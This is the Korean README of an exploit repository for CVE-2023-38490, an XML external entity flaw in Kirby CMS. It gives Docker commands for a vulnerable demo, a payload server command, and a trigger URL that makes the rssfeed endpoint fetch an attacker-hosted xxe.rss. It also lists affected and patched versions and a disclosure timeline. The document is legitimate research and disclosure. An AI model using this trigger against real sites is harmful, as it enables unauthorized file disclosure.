Kirby XML 외부 엔티티 (XXE) - CVE-2023-38490 익스플로잇
Kirby < 3.9.6 XML 외부 엔티티
다음 취약점에 대한 익스플로잇: CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
익스플로잇 시연
취약한 데모 앱 빌드 및 실행:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
데모 페이로드 제공:
참고: 도커 컨테이너가 접근할 수 있는 바인드 주소를 선택하세요.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
익스플로잇 트리거:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
어떻게, 왜 작동하나요?
취약한 함수는 Kirby Core에 존재하지만 Kirby Core, Kirby StarterKit 또는 Kirby PlainKit에서 기본적으로 사용되지 않습니다. 즉, 기본 설정에서는 영향을 받지 않지만, 맞춤 개발이나 영향을 받는 툴킷을 사용하는 플러그인을 설치할 경우 취약점이 발생할 수 있습니다.
자세한 내용은 전용 문서를 읽어보세요 (EN 🇬🇧 또는 FR 🇫🇷).
참고 자료
- 대상 소프트웨어: Kirby
- 홈페이지 / 공급업체: https://getkirby.com/
- 소스 코드:
- 취약한 버전:
- <= 3.5.8.2
- 3.6.0-3.6.6.2
- 3.7.0-3.7.5.1
- 3.8.0-3.8.4
- 3.9.0-3.9.5
- 패치된 버전:
- 3.5.8.3+
- 3.6.6.3+
- 3.7.5.2+
- 3.8.4.1+
- 3.9.6+
- 패치:
- 권고:
타임라인
- 24주차 - 2023년 6월 12일 월요일: Alexandre ZANNI (@noraj), ACCEIS의 침투 테스트 엔지니어가 취약점 발견.
- 24주차 - 2023년 6월 13일 화요일: Alexandre ZANNI가 편집자(Kirby)에게 취약점 보고
- 24주차 - 2023년 6월 14일 수요일: Alexandre ZANNI가 편집자(Kirby)에게 개념 증명 공유
- 24주차 - 2023년 6월 14일 수요일: getkirby.com에 RFC 9116 security.txt 추가
- 24주차 - 2023년 6월 15일 목요일: 편집자(Kirby)가 취약점 확인
- 24주차 - 2023년 6월 15일 목요일: 수정 및 패치 릴리스 계획
- 26주차 - 2023년 6월 29일 목요일: FORMER 03의 Patrick FALB (@dapatrese)가 독립적으로 취약점 발견.
- 28주차 - 2023년 7월 16일 일요일: 비공개 GitHub 보안 권고 생성
- 29주차 - 2023년 7월 23일 일요일: CVE ID 요청
- 29주차 - 2023년 7월 23일 일요일: 편집자(Kirby)가 취약점 패치
- 30주차 - 2023년 7월 24일 월요일: 편집자(Kirby)가 Alexandre ZANNI를 비공개 권고에 초대
- 30주차 - 2023년 7월 24일 월요일: Alexandre ZANNI가 취약한 데모 도커 컨테이너 준비
- 30주차 - 2023년 7월 24일 월요일: CVE ID CVE-2023-38490 등록(예약)
- 30주차 - 2023년 7월 27일 목요일: GitHub 보안 권고 및 패치 공개 릴리스
면책 조항
ACCEIS는 불법 활동을 조장하거나 장려하지 않으며, 이 저장소에서 제공되는 모든 콘텐츠는 연구, 교육 및 위협 탐지 목적으로만 제공됩니다.